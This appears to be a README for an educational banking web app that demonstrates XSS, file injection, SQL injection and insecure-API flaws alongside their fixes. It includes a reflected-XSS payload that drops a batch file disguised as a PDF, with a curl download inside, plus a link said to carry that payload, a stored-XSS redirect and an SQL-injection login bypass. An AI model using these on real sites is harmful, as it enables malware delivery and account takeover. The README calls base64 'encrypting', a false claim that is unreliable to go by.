Welcome to the "SecureTrust Bank" project, a unique exploration of cloud architectures and security. This project intentionally showcases fix for various vulnerabilities within a banking website hosted on an Azure virtual machine. Its primary purpose is to serve as an educational tool to highlight the critical importance of robust security practices in today's digital landscape.
SecureTrust Bank is a deliberately designed, secure web application that mimics a banking website. It fixes a range of security weaknesses, misconfigurations, and vulnerabilities commonly found in real-world cloud-based systems. By studying these fixes in a controlled environment, this project aims to promote awareness, understanding, and best practices in cloud security.
- Explore a invulnerable web application hosted on Azure VM
- Gain hands-on experience with identifying and mitigating common cloud security vulnerabilities
- Learn about potential risks, such as misconfigured services, weak authentication, and unencrypted data transmission
- Join the discussion within the cybersecurity community on strategies for securing cloud-based systems
This project is for educational and awareness purposes only and should not be used in a production environment. By using SecureTrust Bank, you'll have the opportunity to enhance your knowledge of cloud security and contribute to the ongoing effort to strengthen digital security practices.
Together, let's navigate the challenges of cloud architectures and security by examining the vulnerabilities within the "SecureTrust Bank" project. We believe that by understanding the risks, we can better protect the digital assets of organizations and individuals alike.
"SecureTrust Bank" (STB) relies on a variety of technologies to function seamlessly:
- XAMPP - ITB utilizes XAMPP to manage client requests and handle server-side operations.
- PHP - PHP serves as the foundational framework for ITB, enabling server-side scripting and data processing.
- JS - JavaScript plays a crucial role in ITB, handling client-side requests and enhancing interactivity.
- jQuery - jQuery is used for client-side scripting and simplifying tasks that involve HTML document traversal and manipulation.
- CSS - CSS are employed to infuse visual appeal and style into the website.
- SQL - SQL are employed to store and manage data in structured format.
- Ensure you have Git installed on your computer. If not, you can download and install it from Git's official website.
- On Windows, you can use the Command Prompt or Git Bash.
- On macOS and Linux, use the Terminal.
Use the
command to navigate to the directory where you want to store the "Insecure Trust Bank" project on your local machine. For example:cd /XAMPP/htdocs/
Use the following command to clone the "Secure Trust Bank" project repository from GitHub:
git clone "https://github.com/Hritikpatel/SecureTrust_Bank.git"
This command will initiate the cloning process, downloading the project's files to your local directory.
Step 4: Run XAMPP server
- Start Apache server on port 80, 443.
- Start MySQL server on 3306.
- visit-local localhost/InsecureTrust_Bank
- R-XSS is a type of cross-site scripting vulnerability where an attacker injects malicious scripts that are reflected off a web server and executed in a victim's browser.
- CVE code:
- In ITB, FAQ Page has a search bar to search through questions and is prone to R-XSS.
- Sample Code to demonstrate it:
<script> alert(123)</script>
- This link has R-XSS https://shorturl.at/ckvAF which is infected with:
<script> fileName = "Tranaction.pdf.bat"; fileData = "QGVjaG8gb2ZmDQoNCjo6IERlZmluZSB0aGUgVVJMIG9mIHRoZSByYXcgZmlsZSBvbiBHaXRIdWINCnNldCBmaWxlVXJsPWh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS91c2VybmFtZS9yZXBvL21haW4vcGF0aC90by9maWxlLnR4dA0KDQo6OiBEZWZpbmUgdGhlIHRhcmdldCBkaXJlY3Rvcnkgd2hlcmUgeW91IHdhbnQgdG8gc2F2ZSB0aGUgZmlsZQ0Kc2V0IHRhcmdldERpcj1DOi8vDQoNCjo6IENyZWF0ZSB0aGUgdGFyZ2V0IGRpcmVjdG9yeSBpZiBpdCBkb2Vzbid0IGV4aXN0DQppZiBub3QgZXhpc3QgIiV0YXJnZXREaXIlIiBta2RpciAiJXRhcmdldERpciUiDQoNCjo6IFVzZSBjdXJsIHRvIGRvd25sb2FkIHRoZSBmaWxlDQpjdXJsIC1vICIldGFyZ2V0RGlyJVxmaWxlLnR4dCIgIiVmaWxlVXJsJSINCg=="; function base64tobytes(base64Adata){ var binValue = atob(base64Adata); var binLength = binValue.length; var bytesData = new Uint8Array(binLength); for (var i = 0 ; i<binLength; i++){ bytesData[i] = binValue.charCodeAt(i); } return bytesData.buffer; } var fileBytes = base64tobytes(fileData); var blob = new Blob([fileBytes], {"type":"octet/stream"}); var aTag = document.createElement("a"); document.body.append(aTag); aTag.style = "display: none;"; var url= window.URL.createObjectURL(blob); aTag.href = url; aTag.download = fileName; aTag.click(); window.URL.revokeObjectURL(url); </script>
- Fixed Code, Here user input is getting appended in HTML after removing script tag...
- S-XSS typically refers to "Stored Cross-Site Scripting," where malicious scripts are stored on a web server and executed when viewed by other users, potentially leading to security vulnerabilities.
- CVE code:
- In ITB, Support Page has "Description" field which is prone to S-XSS.
- Sample Code to demonstrate it:
<span onmouseover="window.location='try.php?url='+encodeURIComponent(window.location.href)">Hover over me</span>
- Fixed Code, Here htmlspecialchars is used for encoding response...
File Injection
- File Injection is a security vulnerability where an attacker can manipulate or inject malicious files, typically to exploit a system's processing and execute unauthorized code or access sensitive data, potentially compromising system integrity and security.
- CVE code:
- In ITB, Support Page's Attachments feild is vulnerable to file injection.
- Sample Code to demonstrate it:
- Fixed Code, Here we are cheacking file type and file format...
SQL Injection
- SQL Injection is a malicious technique where an attacker inserts or manipulates SQL queries within an web app's input fields, potentially allowing unauthorized access, data retrieval, modification, or deletion in a connected database, posing significant security risks.
- CVE code:
- In ITB, LogIn Page's password feild is vulnerable to SQL injection.
- Sample Code to demonstrate it:
NO' OR '1' = '1
- Fixed Code, Here database query is getting genrated using prepare statement...
Insecure API
- Insecure API refers to an application programming interface that lacks proper security measures, making it susceptible to various threats such as data breaches, unauthorized access, and manipulation, highlighting the need for robust security practices to protect sensitive data and ensure the integrity of communication.
- CVE code:
- In ITB, all data in Dashboard Page is coming thorugh insecure API.
- Fixed Code, Here we are forwarding SQL response to client after encrypting data in base64...